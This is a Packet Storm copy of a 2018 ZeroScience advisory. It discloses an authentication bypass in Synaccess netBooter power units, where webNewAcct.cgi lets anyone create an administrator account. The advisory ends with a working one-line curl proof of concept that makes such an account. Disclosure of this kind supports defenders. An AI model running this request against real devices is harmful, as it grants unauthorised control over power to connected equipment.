exploit the possibilities

Synaccess netBooter NP-02x / NP-08x 6.8 Authentication Bypass

Synaccess netBooter NP-02x / NP-08x 6.8 Authentication Bypass
Posted Nov 19, 2018
Authored by LiquidWorm | Site zeroscience.mk

Synaccess netBooter NP-02x and NP-08x version 6.8 suffer from an authentication bypass vulnerability due to a missing control check when calling the webNewAcct.cgi script while creating users. This allows an unauthenticated attacker to create an admin user account and bypass authentication giving her the power to turn off a power supply to a resource.

tags | exploit, cgi, bypass
MD5 | b35aa71589ba337fad0f50e2db1dd972

Synaccess netBooter NP-02x / NP-08x 6.8 Authentication Bypass

Change Mirror Download

Synaccess netBooter NP-02x/NP-08x 6.8 Authentication Bypass


Vendor: Synaccess Networks Inc.
Product web page: https://www.synaccess-net.com
Affected version: NP-0201D (ver 6.8C)
NP-02 (ver 6.5C)
NP-02 (ver 6.4BC)
NP-0801D (ver 6.4A)
NP-08 (ver 6.10)
NP-02 (ver 5.53BC)

Summary: netBooter NP-02B and NP-02BH provide independent
control of one or two outlets in a small, robust form factor.
Manageable via TCP/IP network or direct serial connection
and 1U brackets (optional) for mounting. Control power to
your devices with the ability to fit just about anywhere.

netBooter NP-0801DU and NP-0801DUH PDUs provide secured
remote power source management of 8 independent outlets.
Includes true RMS AC current reading and environment
temperature monitoring* via TCP/IP networks or local direct
connection.

Desc: netBooter suffers from an authentication bypass
vulnerability due to missing control check when calling
webNewAcct.cgi script while creating users. This allows an
unauthenticated attacker to create admin user account and
bypass authentication giving her the power to turn off a
power supply to a resource.

Tested on: Synaccess server


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2018-5500
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5500.php


05.11.2018

--

PoC:

curl -i http://10.0.0.17/webNewAcct.cgi --data "A1=hackerplusplus&A2=1234&A2=1234"

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    16 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close